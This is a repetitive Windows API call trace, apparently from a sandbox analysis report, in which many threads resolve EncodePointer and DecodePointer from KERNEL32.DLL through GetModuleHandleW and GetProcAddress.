[0199.144] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 203 os_tid = 0x38c [0199.620] SysReAllocStringLen (in: pbstr=0x658f4bc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658f4bc*="KERNEL32.DLL") returned 1 [0199.620] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.621] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.624] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.624] SysReAllocStringLen (in: pbstr=0x658f4bc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658f4bc*="KERNEL32.DLL") returned 1 [0199.624] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.625] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.628] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.628] SysReAllocStringLen (in: pbstr=0x658f498*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658f498*="KERNEL32.DLL") returned 1 [0199.628] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.632] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.635] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.638] SysReAllocStringLen (in: pbstr=0x658f770*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658f770*="KERNEL32.DLL") returned 1 [0199.638] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.639] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.642] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 204 os_tid = 0x5dc [0199.902] SysReAllocStringLen (in: pbstr=0x58af98c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af98c*="KERNEL32.DLL") returned 1 [0199.902] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.906] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.906] SysReAllocStringLen (in: pbstr=0x58af98c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af98c*="KERNEL32.DLL") returned 1 [0199.906] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.907] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.909] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.910] SysReAllocStringLen (in: pbstr=0x58af968*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af968*="KERNEL32.DLL") returned 1 [0199.910] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.913] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.916] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.919] SysReAllocStringLen (in: pbstr=0x58afc40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58afc40*="KERNEL32.DLL") returned 1 [0199.919] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.923] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 205 os_tid = 0x2dc [0200.852] SysReAllocStringLen (in: pbstr=0xb79f3dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f3dc*="KERNEL32.DLL") returned 1 [0200.852] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.852] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.855] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.855] SysReAllocStringLen (in: pbstr=0xb79f3dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f3dc*="KERNEL32.DLL") returned 1 [0200.855] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.855] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.857] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.858] SysReAllocStringLen (in: pbstr=0xb79f3b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f3b8*="KERNEL32.DLL") returned 1 [0200.858] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.860] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0200.862] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.867] SysReAllocStringLen (in: pbstr=0xb79f690*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f690*="KERNEL32.DLL") returned 1 [0200.867] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.870] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 206 os_tid = 0xa38 [0201.830] SysReAllocStringLen (in: pbstr=0x6adf8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf8b4*="KERNEL32.DLL") returned 1 [0201.830] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.832] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.833] SysReAllocStringLen (in: pbstr=0x6adf8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf8b4*="KERNEL32.DLL") returned 1 [0201.833] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.833] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.836] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.836] SysReAllocStringLen (in: pbstr=0x6adf890*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf890*="KERNEL32.DLL") returned 1 [0201.836] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.837] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.839] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0201.842] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.923] SysReAllocStringLen (in: pbstr=0x6adfb68*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adfb68*="KERNEL32.DLL") returned 1 [0202.923] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.923] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.926] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 207 os_tid = 0x614 [0201.770] SysReAllocStringLen (in: pbstr=0xb79f4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f4b4*="KERNEL32.DLL") returned 1 [0201.770] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.773] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.774] SysReAllocStringLen (in: pbstr=0xb79f4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f4b4*="KERNEL32.DLL") returned 1 [0201.774] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.776] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.777] SysReAllocStringLen (in: pbstr=0xb79f490*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f490*="KERNEL32.DLL") returned 1 [0201.777] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.777] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.779] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0201.781] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.848] SysReAllocStringLen (in: pbstr=0xb79f768*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb79f768*="KERNEL32.DLL") returned 1 [0201.848] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.849] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.851] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 208 os_tid = 0x7d8 [0201.784] SysReAllocStringLen (in: pbstr=0x16b1f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1f694*="KERNEL32.DLL") returned 1 [0201.784] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.786] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.787] SysReAllocStringLen (in: pbstr=0x16b1f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1f694*="KERNEL32.DLL") returned 1 [0201.787] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.787] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.789] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.790] SysReAllocStringLen (in: pbstr=0x16b1f670*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1f670*="KERNEL32.DLL") returned 1 [0201.790] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.792] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0201.795] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.916] SysReAllocStringLen (in: pbstr=0x16b1f948*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1f948*="KERNEL32.DLL") returned 1 [0202.916] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.920] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 211 os_tid = 0xab4 [0202.476] SysReAllocStringLen (in: pbstr=0x937f494*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f494*="KERNEL32.DLL") returned 1 [0202.476] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.477] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.480] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.481] SysReAllocStringLen (in: pbstr=0x937f494*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f494*="KERNEL32.DLL") returned 1 [0202.481] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.485] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.485] SysReAllocStringLen (in: pbstr=0x937f470*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f470*="KERNEL32.DLL") returned 1 [0202.485] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.486] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.489] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0202.493] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.929] SysReAllocStringLen (in: pbstr=0x937f748*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f748*="KERNEL32.DLL") returned 1 [0202.929] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.933] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 212 os_tid = 0x5f4 [0202.495] SysReAllocStringLen (in: pbstr=0x168dfa8c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168dfa8c*="KERNEL32.DLL") returned 1 [0202.495] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.499] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.500] SysReAllocStringLen (in: pbstr=0x168dfa8c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168dfa8c*="KERNEL32.DLL") returned 1 [0202.500] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.503] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.504] SysReAllocStringLen (in: pbstr=0x168dfa68*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168dfa68*="KERNEL32.DLL") returned 1 [0202.504] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.509] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0202.513] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.935] SysReAllocStringLen (in: pbstr=0x168dfd40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168dfd40*="KERNEL32.DLL") returned 1 [0202.935] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.937] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 214 os_tid = 0x5c4 [0202.891] SysReAllocStringLen (in: pbstr=0x16d7f87c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7f87c*="KERNEL32.DLL") returned 1 [0202.891] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.891] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.895] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.896] SysReAllocStringLen (in: pbstr=0x16d7f87c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7f87c*="KERNEL32.DLL") returned 1 [0202.896] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.900] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.900] SysReAllocStringLen (in: pbstr=0x16d7f858*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7f858*="KERNEL32.DLL") returned 1 [0202.900] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.904] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0202.907] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0202.988] SysReAllocStringLen (in: pbstr=0x16d7fb30*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7fb30*="KERNEL32.DLL") returned 1 [0202.988] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0202.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0202.991] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 217 os_tid = 0xb24 [0204.159] SysReAllocStringLen (in: pbstr=0xb78fa4c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb78fa4c*="KERNEL32.DLL") returned 1 [0204.160] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.160] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.163] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.163] SysReAllocStringLen (in: pbstr=0xb78fa4c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb78fa4c*="KERNEL32.DLL") returned 1 [0204.163] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.167] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.167] SysReAllocStringLen (in: pbstr=0xb78fa28*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb78fa28*="KERNEL32.DLL") returned 1 [0204.167] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.170] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0204.173] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.421] SysReAllocStringLen (in: pbstr=0xb78fd00*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb78fd00*="KERNEL32.DLL") returned 1 [0204.421] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.424] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 218 os_tid = 0xb6c [0204.095] SysReAllocStringLen (in: pbstr=0x6b0f61c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0f61c*="KERNEL32.DLL") returned 1 [0204.095] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.096] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.099] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.099] SysReAllocStringLen (in: pbstr=0x6b0f61c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0f61c*="KERNEL32.DLL") returned 1 [0204.099] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.103] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.103] SysReAllocStringLen (in: pbstr=0x6b0f5f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0f5f8*="KERNEL32.DLL") returned 1 [0204.103] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.104] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.106] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0204.109] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.292] SysReAllocStringLen (in: pbstr=0x6b0f8d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0f8d0*="KERNEL32.DLL") returned 1 [0204.292] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.296] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 220 os_tid = 0x360 [0204.403] SysReAllocStringLen (in: pbstr=0x16b5f5d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b5f5d4*="KERNEL32.DLL") returned 1 [0204.403] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.404] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.407] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.407] SysReAllocStringLen (in: pbstr=0x16b5f5d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b5f5d4*="KERNEL32.DLL") returned 1 [0204.407] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.411] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.411] SysReAllocStringLen (in: pbstr=0x16b5f5b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b5f5b0*="KERNEL32.DLL") returned 1 [0204.411] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.415] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0204.418] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.500] SysReAllocStringLen (in: pbstr=0x16b5f888*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b5f888*="KERNEL32.DLL") returned 1 [0204.500] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.503] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 221 os_tid = 0xb50 [0204.486] SysReAllocStringLen (in: pbstr=0x16cbf9cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16cbf9cc*="KERNEL32.DLL") returned 1 [0204.486] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.487] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.489] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.490] SysReAllocStringLen (in: pbstr=0x16cbf9cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16cbf9cc*="KERNEL32.DLL") returned 1 [0204.490] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.490] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.492] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.492] SysReAllocStringLen (in: pbstr=0x16cbf9a8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16cbf9a8*="KERNEL32.DLL") returned 1 [0204.492] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.495] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0204.497] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.628] SysReAllocStringLen (in: pbstr=0x16cbfc80*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16cbfc80*="KERNEL32.DLL") returned 1 [0204.628] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.631] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 222 os_tid = 0x4e0 [0205.051] SysReAllocStringLen (in: pbstr=0x6aff4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff4b4*="KERNEL32.DLL") returned 1 [0205.051] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.054] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.055] SysReAllocStringLen (in: pbstr=0x6aff4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff4b4*="KERNEL32.DLL") returned 1 [0205.055] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.058] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.059] SysReAllocStringLen (in: pbstr=0x6aff490*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff490*="KERNEL32.DLL") returned 1 [0205.059] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.059] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.062] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0205.065] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.087] SysReAllocStringLen (in: pbstr=0x6aff768*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff768*="KERNEL32.DLL") returned 1 [0205.087] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.087] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.090] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 223 os_tid = 0xb90 [0205.069] SysReAllocStringLen (in: pbstr=0x16b9fa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9fa0c*="KERNEL32.DLL") returned 1 [0205.069] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.069] 